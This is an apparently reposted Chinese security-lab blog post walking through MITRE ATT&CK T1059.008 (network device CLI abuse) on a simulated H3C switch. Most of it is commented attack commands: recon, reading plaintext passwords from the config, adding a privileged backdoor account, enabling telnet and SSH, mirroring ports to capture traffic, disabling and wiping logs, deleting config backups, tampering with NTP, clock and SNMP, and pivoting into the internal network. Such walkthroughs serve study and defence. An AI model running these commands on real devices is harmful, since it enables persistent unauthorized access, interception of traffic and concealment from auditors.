攻击者可能滥用网络设备的脚本或内置命令行解释器(CLI)来执行恶意命令和载荷。CLI是用户和管理员与设备交互的主要方式,用于查看系统信息、修改设备操作或执行诊断和管理功能。CLI通常包含执行不同命令所需的各种权限级别。
脚本解释器自动化任务并扩展网络操作系统中包含的命令集之外的功能。CLI和脚本解释器可以通过直接的控制台方式访问,也可以通过远程方式访问,如telnet或SSH。攻击者可以使用网络设备CLI来改变设备的行为和操作。CLI可能被用来操控流量以拦截或篡改数据,修改启动配置参数以加载恶意系统软件,或者禁用安全功能或日志记录以避免被发现。
二、技术实现
下面以H3C网络设备为例,说明T1059.008技术的实现方法。
(一)信息收集
1、查看设备型号和版本
//查看系统版本,不同版本支持的功能和命令不同
display version
当前系统版本为Comware V5.20
2、查看当前配置文件
//查看配置文件,大致了解配置情况
display current-configuration
3、查看当前登录用户
display users
当前没有其他用户登录。
4、查看所有本地用户账户
//查看用户名和服务类型
display local-user
当前只有一个用户,名为h3c_user1
5、查看用户名/口令
//配置文件中可能存在明文口令
display current-configuration
存在明文保存的口令:12345678
6、查看设备接口
//获取接口相关配置信息,如IP地址、接口状态等。
display interface brief
7、查看路由表
//查看路由表,获取内部网络信息
display ip routing-table
当前通过OSPF动态路由协议自动生成路由表,但是没有默认路由。
8、查看邻居设备
//使用lldp协议查看邻居设备
display lldp neighbor-infomation
(二)配置修改
1、创建后门账户
创建管理员级别账户,以实现持久化访问。
首先创建账户:
//进入系统视图
system-view
//创建名为hacker1的用户账户
local-user hacker1
//设置账户的密码,加密保存
password cipher 12345678
//指定服务类型
service-type ssh telnet terminal
//指定用户的授权级别,3为最高
authorization-attribute level 3
//退出当前视图
quit
//保存配置
save
//查看用户账户
display local-user user-name hacker1
修改tty配置:
//进入vty线路视图
user-int vty 0 4
//允许所有形式的入站访问
protocol inbound all
//允许用户执行level 3的操作
user privilege level 3
//设置身份认证方式为用户名、密码
authentication-mode scheme
//查看当前视图的配置
display this
设置本地认证:
//指定system域为缺省域
domain default enable system
//配置system域
domain system
//设置认证方式为local,即本地认证
authentication default local
//查看当前视图的配置
display this
2、启用远程访问
启用远程访问功能,如Telnet或SSH,以便远程控制设备。
system-view
//启动telnet服务
telnet server enable
//启动ssh服务
ssh server enable
//查看端口监听情况
display ip socket | include :23
display ip socket | include :22
3、启动设备接口
启动设备接口后,攻击者可将自己的设备物理接入到目标网络中。
system-view
//进入接口视图
interface GigabitEthernet 0/4/7
//开启网络接口
undo shutdown
quit
save
4、捕获流量
配置端口镜像,将流量转发到攻击者物理连接的网络接口,攻击者用自己的电脑抓包分析。
system-view
//创建本地镜像组,编号为1
mirroring-group 1 local
//设置镜像源接口,对出和入双向的数据进行镜像
mirroring-group 1 mirroring-port e 0/4/0 e 0/4/1 both
//指定镜像目的接口
mirroring-group 1 monitor-port e 0/4/7
//确认配置
display mirroring-group 1
save
5、更改日志配置
攻击者通过更改日志配置来掩盖其活动痕迹。
system-view
//禁止将日志发给日志服务器
undo info-center loghost 192.168.1.200
//禁止将日志信息写入内存缓冲区
undo info-center logbuffer
//确认配置
display info-center
save
6、删除日志和配置备份
删除日志和配置备份,以清除攻击者的活动痕迹。
//清除内存中的日志缓冲区
reset logbuffer
//确认操作结果
display logbuffer
日志缓冲区是空的。
//删除配置备份
delete flash:/startup.cfg.bak
//确认删除结果
dir startup.cfg*
save
7、更改NTP配置
攻击者通过更改NTP配置来破坏设备之间的时间同步。
system-view
//查看时间服务器配置
display ntp-services sessions
//删除时间服务器
undo ntp-service unicast-server 192.168.1.200
save
8、更改时间设置
更改设备的时间设置,以干扰日志记录和审计。
//修改系统时间
clock datetime 2025/01/01 00:00:00
//查看系统时间
display clock
save
9、更改SNMP配置
攻击者可以更改SNMP配置,以更方便地获取设备信息。
system-view
//修改读字符串的值为public
snmp-agent community read public
//查看snmp社区字符串配置
10、更改路由配置
攻击者可以更改路由配置,以打通网络。
system-view
//添加默认路由
ip route-static 0.0.0.0 0.0.0.0 192.168.12.2
save
11、作为跳板访问内网主机
攻击者利用收集到的凭据信息,在网络设备上使用telnet、ssh命令访问内网主机或其它设备。
telnet 192.168.12.2
三、总结
以上实验中的H3C设备使用的是LITO模拟器,版本1.4.4。
原文始发于微信公众号(新蜂网络安全实验室):Mitre Att&ck框架T1059.008技术(Network Device CLI)的简单实现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论